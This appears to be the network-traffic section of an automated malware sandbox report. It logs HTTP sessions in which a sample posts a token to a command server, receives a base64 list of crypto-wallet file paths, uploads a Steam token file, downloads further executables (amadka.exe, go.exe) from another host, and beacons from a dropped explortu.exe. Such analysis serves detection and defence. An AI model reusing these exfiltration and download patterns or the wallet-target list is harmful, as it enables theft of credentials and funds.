                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                Jun 27, 2024 05:58:13.052989006 CEST94OUTGET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:13.228188038 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:13 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "13bf0-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 80880
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                Jun 27, 2024 05:58:13.886678934 CEST197OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG
                                                                Host: 85.28.47.4
                                                                Content-Length: 947
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:14.609411001 CEST202INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:13 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=85
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jun 27, 2024 05:58:14.665220022 CEST464OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
                                                                Host: 85.28.47.4
                                                                Content-Length: 267
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a
                                                                Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="message"wallets------GHJKECAAAFHJECAAAEBF--
                                                                Jun 27, 2024 05:58:14.841375113 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:14 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 2408
                                                                Keep-Alive: timeout=5, max=84
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                Jun 27, 2024 05:58:14.843990088 CEST462OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK
                                                                Host: 85.28.47.4
                                                                Content-Length: 265
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 2d 2d 0d 0a
                                                                Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="message"files------AEHIDAKECFIEBGDHJEBK--
                                                                Jun 27, 2024 05:58:15.020627975 CEST202INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:14 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=83
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jun 27, 2024 05:58:15.037130117 CEST560OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI
                                                                Host: 85.28.47.4
                                                                Content-Length: 363
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file"------ECGHJJEHDHCAAKFIIDGI--
                                                                Jun 27, 2024 05:58:15.734996080 CEST202INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:15 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=82
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jun 27, 2024 05:58:15.762976885 CEST467OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH
                                                                Host: 85.28.47.4
                                                                Content-Length: 270
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a
                                                                Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"jbdtaijovg------HJJJECFIECBGDGCAAAEH--
                                                                Jun 27, 2024 05:58:16.469623089 CEST331INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:15 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 104
                                                                Keep-Alive: timeout=5, max=81
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 32 31 70 62 6d 55 76 59 57 31 68 5a 47 74 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 47 68 30 64 48 41 36 4c 79 38 33 4e 79 34 35 4d 53 34 33 4e 79 34 34 4d 53 39 6a 62 33 4e 30 4c 32 64 76 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 41 3d 3d
                                                                Data Ascii: aHR0cDovLzc3LjkxLjc3LjgxL21pbmUvYW1hZGthLmV4ZXwwfDB8fGh0dHA6Ly83Ny45MS43Ny44MS9jb3N0L2dvLmV4ZXwwfDB8fA==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.64971477.91.77.81802308C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:58:16.478039980 CEST77OUTGET /mine/amadka.exe HTTP/1.1
                                                                Host: 77.91.77.81
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:17.171430111 CEST1236INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:58:17 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 1902080
                                                                Last-Modified: Thu, 27 Jun 2024 03:06:38 GMT
                                                                Connection: keep-alive
                                                                ETag: "667cd73e-1d0600"
                                                                Accept-Ranges: bytes
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 13 50 4a 58 72 3e 19 58 72 3e 19 58 72 3e 19 03 1a 3d 18 56 72 3e 19 03 1a 3b 18 f8 72 3e 19 8d 1f 3a 18 4a 72 3e 19 8d 1f 3d 18 4e 72 3e 19 8d 1f 3b 18 2d 72 3e 19 03 1a 3a 18 4c 72 3e 19 03 1a 3f 18 4b 72 3e 19 58 72 3f 19 8c 72 3e 19 c3 1c 37 18 59 72 3e 19 c3 1c c1 19 59 72 3e 19 c3 1c 3c 18 59 72 3e 19 52 69 63 68 58 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 57 59 50 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 c4 01 00 00 00 00 00 00 f0 4b 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJXr>Xr>Xr>=Vr>;r>:Jr>=Nr>;-r>:Lr>?Kr>Xr?r>7Yr>Yr><Yr>RichXr>PELWYPfK@ LU@VjpKHK `@.rsrcp@.idata @ P+@kvnoqpwr1@skikhnnmK@.taggant0K"@
                                                                Jun 27, 2024 05:58:17.171447039 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jun 27, 2024 05:58:17.171464920 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jun 27, 2024 05:58:17.171477079 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jun 27, 2024 05:58:17.171489000 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jun 27, 2024 05:58:17.171500921 CEST672INData Raw: 24 77 90 b5 89 a9 a7 31 29 7d 50 b6 23 4a 12 4a d5 71 c0 57 e0 7b 27 12 1d 87 42 36 64 9b 27 32 05 e9 a0 c1 fb 73 c4 b3 83 a7 06 a1 e4 77 81 19 9c 2b 0d 4c 19 7b 40 41 9f db 50 c2 09 0b 4d 6a e5 b7 00 42 d5 ca c4 13 55 ab 7a 97 76 2b 41 56 22 b4
                                                                Data Ascii: $w1)}P#JJqW{'B6d'2sw+L{@APMjBUzv+AV"wy@!s![wW1B]JlX[@wG5'{07[L+W'Tl4@I?UP5GCJ0HR325BK$3G)?B&I
                                                                Jun 27, 2024 05:58:17.171514034 CEST1236INData Raw: 89 b2 c0 ed 9e 27 11 ca 82 e4 c8 11 75 2b fb e3 f8 ab ec cc 9c 6a 07 b2 93 ac 1a 0d d5 9c f8 c9 67 ac c0 a0 90 ac 67 b4 29 ce 4b 92 94 37 52 be 05 73 c1 05 f5 9d 5a b8 cf 9b 70 12 35 3f c5 13 04 9c b0 ca 69 11 cd d1 e3 fb 50 3e d9 b0 01 46 37 9b
                                                                Data Ascii: 'u+jgg)K7RsZp5?iP>F7fK$!7W=$JweYq"wv]WSD4Q,d+gqQ{U51PE@]JP&{}zRH26QY<w
                                                                Jun 27, 2024 05:58:17.171564102 CEST1116INData Raw: 3d e5 e5 02 4c 53 34 12 62 15 85 ab 92 cd 1c 86 be 0b 07 55 56 bc 91 c2 87 17 f3 09 09 c0 08 14 0a fd 25 93 24 fb 40 da 13 aa 1e 49 60 5e 0d 04 23 a9 36 a8 25 f5 41 c2 c3 c5 f0 39 5c 32 d9 22 14 46 cf 4f 77 ee 3a ac bc d5 08 d5 96 0f 41 ba 0b c1
                                                                Data Ascii: =LS4bUV%$@I`^#6%A9\2"FOw:A7bcsM2=_&OW]OS!%wH(4,A*6#Dv"ZOY6"")O6jFw /WI oJ02`8.vN(cN^S!OY-(3
                                                                Jun 27, 2024 05:58:17.171623945 CEST1236INData Raw: 05 5b a7 b5 0f e5 15 6a f2 64 d7 54 71 c6 1c be c9 d4 56 e9 15 de fb 71 7c 4f 7b 08 11 2d 2f 63 03 76 2c d2 e7 ec 35 fd 46 32 31 1b 2d 22 3f 59 45 28 88 06 ac 4c 5e b3 a5 6d 00 67 e0 36 47 aa de 37 c7 02 ed 25 6e c5 05 e6 30 c2 89 b4 55 f3 91 88
                                                                Data Ascii: [jdTqVq|O{-/cv,5F21-"?YE(L^mg6G7%n0U@A6m>dfMr@YlR)CzA\CFYU:%t0|.K]DS.m*l6W<5QR7};V9PuSx?| ENYi(J(<B
                                                                Jun 27, 2024 05:58:17.171636105 CEST1236INData Raw: a0 26 41 37 12 5b c9 61 97 e4 17 5a 73 43 03 7c 7a 27 b6 5f 60 44 52 da 23 2e 2a 96 50 3a 04 8c fd c0 f1 03 a3 fb 03 6a b7 a9 2c 42 c2 7d a8 fd 00 b7 64 45 c9 37 b5 f5 b6 32 6a 3e 37 21 9d 25 9a 5e 18 b4 e7 73 05 03 a4 36 ea 8c b6 aa 9e 02 3d aa
                                                                Data Ascii: &A7[aZsC|z'_`DR#.*P:j,B}dE72j>7!%^s6=+XZ4VSQMef#cx(Ux A6`i\S7nV|#;MI^#8%$."45O<Qt77^'t%3:8O&CRR!F>NXjP9
                                                                Jun 27, 2024 05:58:17.178066015 CEST1236INData Raw: 9e e3 5b eb 34 1c 45 64 20 b3 03 8c e3 a9 71 e4 99 3d df 13 37 8f 04 c6 ad 9c 5d b6 51 a6 ad bd 67 92 69 c8 7b 7d bd 8b 52 15 5e 84 d5 0a 0b 10 44 d9 c0 5d d5 97 5d 21 a2 a0 d1 e0 03 d5 ff 46 c0 9a 67 f1 ee cf e0 ef da 86 be 9f b0 24 bc ca af ad
                                                                Data Ascii: [4Ed q=7]Qgi{}R^D]]!Fg$l;>pAkh$MFs-*JUuIh|k^B6aw^t#k-d$Rso{{ \D;=2!.>qC6flsy*vQ'@j


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.649728147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:03.185729980 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:03.861252069 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:03.862163067 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:04.072777033 CEST283INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 35 64 0d 0a 20 3c 63 3e 31 30 30 30 30 32 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 62 30 64 35 64 61 32 63 38 35 30 36 37 33 62 35 64 37 36 61 63 31 63 65 38 63 63 64 34 61 36 65 37 66 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 5d <c>1000022001+++b5937c1a99d5f9db0d5da2c850673b5d76ac1ce8ccd4a6e7f1fbd97e9c4543b31de15441#<d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
